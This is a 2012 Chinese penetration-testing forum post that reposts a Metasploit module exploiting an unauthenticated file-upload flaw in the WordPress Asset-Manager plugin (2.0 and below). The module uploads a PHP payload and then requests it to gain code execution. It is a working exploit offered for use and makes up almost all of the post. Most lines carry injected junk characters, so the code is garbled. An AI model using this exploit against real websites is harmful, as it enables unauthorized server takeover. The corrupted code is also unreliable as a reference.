找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 WordPress Asset-Manager PHP文件上传漏洞
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2252|回复: 0
打印 上一主题 下一主题

WordPress Asset-Manager PHP文件上传漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-31 09:22:33 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。
/ P" m& V$ q/ e" b% _1 @3 j# N# V) R0 Y. d* X* y. K0 g5 r9 N
##
# A$ v# v9 O$ v+ u% D* r# This file is part of the Metasploit Framework and may be subject to
3 y% O# w4 x  p8 y9 \- O( N# redistribution and commercial restrictions. Please see the Metasploit
) V9 `* w6 i/ ^  l" `/ C% B# Framework web site for more information on licensing and terms of use./ Z% v' s; r: ]% h
#   http://metasploit.com/framework/" I6 p6 n' B+ W# W( c; e. ]
### T3 W: _8 k/ r

6 |" Q8 K2 L: J' v' ]# r8 E: Srequire 'msf/core'' d" p) s2 S" y, \2 |% v
require 'msf/core/exploit/php_exe', o# U* p  U# {  y- s& e2 c
+ S0 W% G% T; _! \5 T
class Metasploit3 < Msf::Exploit::Remote% u- T7 g. m  ^: o4 Z
  Rank = ExcellentRanking/ o3 h, |& ]8 T$ E. ]2 J
: S1 j0 m( \, _% u8 O
  include Msf::Exploit::Remote::HttpClient
: R! a( |2 ]6 B+ q  include Msf::Exploit:hpEXE
; C% t9 U+ p* L  P( U
) Z5 `% H% s, ~  t& d  def initialize(info = {})* @+ k$ n3 p6 T& v7 D  M
    super(update_info(info,
" ^! \2 U+ X& Y0 h# ?) ~# V& J      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
( S. _+ p8 b2 f3 `3 T1 k      'Description'    => %q{
$ w4 o4 P- s+ Z        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress
, `, a8 l) j" y. \        plugin.  By abusing the upload.php file, a malicious user can upload a file to a
& E/ X1 j$ l: I$ E+ d# P        temp directory without authentication, which results in arbitrary code execution.( n: J- A* ^6 I$ Q2 f  `
      },& ]+ r( C1 m# B2 q- Y
      'Author'         =>
3 T) X- T) z; I* A5 _3 W& e        [) I9 n3 M6 U4 g( n4 }. e9 ?
          'Sammy FORGIT', # initial discovery1 N5 h+ X( {0 g1 f$ r9 T
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module# U8 P+ i" c/ t; n6 s
        ],7 l2 l  G, n3 K+ d; \9 U* p: h6 c- A1 ]
      'License'        => MSF_LICENSE,
# V$ D3 R4 _, n      'References'     =>1 v% z4 F, h2 e& z& v4 J
        [
) a- L2 M( W/ F& T          [ 'OSVDB', '82653' ],
8 d+ w$ K3 m! W' O" e! K          [ 'BID', '53809' ],
1 j) @' |- ?- B* V; `( w5 l          [ 'EDB', '18993' ],; l( Y, f5 D3 M. [; e/ i
          [ 'URL', 'http:// www.myhack58.com /' ]
+ S# P9 P0 e( k4 r/ H4 I& C        ],3 R. ?: J7 N0 e4 E$ ]
      'Payload'       =>+ j# e2 B6 K& i$ [" D( s6 n, x
        {+ H% o1 d6 p" ]: x3 ]5 `
          'BadChars' => "\x00",
$ k" i1 y7 [8 p1 i; U* W' h        },
/ A; J% y8 \; D- b9 p      'Platform'       => 'php',
0 s9 J! i: G! t4 P  m$ V      'Arch'           => ARCH_PHP," @, E% a- v; W+ T
      'Targets'        =>* S, A! Y+ V+ a6 d8 w% X
        [0 {( ^% [3 i; I( c2 B4 B
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
. s5 X: W2 H% [          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
" c0 _3 N# d+ \. f  W. [& h/ `        ],
- U1 Q, W$ p# x$ Q      'DefaultTarget' => 0,$ L8 Y' ]7 W% c6 D( H. r: g
      'DisclosureDate' => 'May 26 2012')). \, u8 S* `* u
: b: L& _" S# x; N
    register_options(1 J8 N4 C9 ?; l2 \
      [
6 k0 g8 G. q+ x) f6 d        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])) u9 {* R4 y; l4 I/ y( P
      ], self.class)' P4 W1 Y$ y3 u" a& l( U; d8 @
  end
3 n. q* j# d8 i" O+ N 2 h* |5 ]  o3 E4 ?  _8 f! Q
  def exploit. h& y2 q5 w3 I+ S7 l9 S: {9 {
    uri =  target_uri.path3 W! c! u  t9 p6 T
    uri << '/' if uri[-1,1] != '/'
7 d) U" o, `( H' j3 }    peer = "#{rhost}:#{rport}"( g, L/ O8 p% H9 G9 S1 r2 |2 v
    payload_name = "#{rand_text_alpha(5)}.php"$ g% j6 l( ]  O1 q1 _1 O
    php_payload = get_write_exec_payload(:unlink_self=>true)
& v% B- P1 i7 b# \
( _. U0 A1 P( c# o0 a    data = Rex::MIME::Message.new/ m- D* ~) ~& e2 a" ~
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")$ k1 J4 n5 y  V6 H" N
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')' o1 ^# D) k/ d) x& o$ v; s
1 E! Y8 {+ T: Q. H
    print_status("#{peer} - Uploading payload #{payload_name}")& H" K& _" R# \. b+ a  Z
    res = send_request_cgi({
, B$ l: u7 u$ H5 n" \# R      'method'  => 'POST',
" T' f( F, T  S2 S9 L      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
1 F& I9 X$ I8 Y8 r( T, l" @% J      'ctype'   => "multipart/form-data; boundary=#{data.bound}",* v$ A; k# y3 A) L
      'data'    => post_data
! c$ t/ W- [1 }. o# Z    })
" x/ l; g) I! b8 G0 m9 y9 c
8 V5 C8 D' Q+ Z+ f) o  ^    if not res or res.code != 200 or res.body !~ /#{payload_name}/7 M1 D0 y' T7 A# {
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")7 g4 N( }, M) R4 q; f6 M  {
end8 D4 `- x) P$ d) L3 L* o7 F

8 h/ z% ?0 s1 b6 ~! G0 s6 T6 |% B    print_status("#{peer} - Executing payload #{payload_name}")& y8 Q" t3 l) r
    res = send_request_raw({
  {4 f3 l% e& u6 E, i      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",9 J+ Q0 W: ~' i2 \3 q# Z
      'method'  => 'GET'
8 x' B* B- j$ L$ ~6 s+ }$ ?    })9 G/ f" S4 X7 D
# |' W. c, A- X$ I0 g9 P) O
    if res and res.code != 200- b5 T) b9 M& d& G6 \+ N) v. r
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")( Y& X7 z$ {' a( N4 z9 `9 G
    end
# d) e# K' d- h7 C& `' c7 u  end
1 Q0 @& p, D0 Y, T: J: }end
0 ^' b$ b( a3 C' c: ]4 r
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表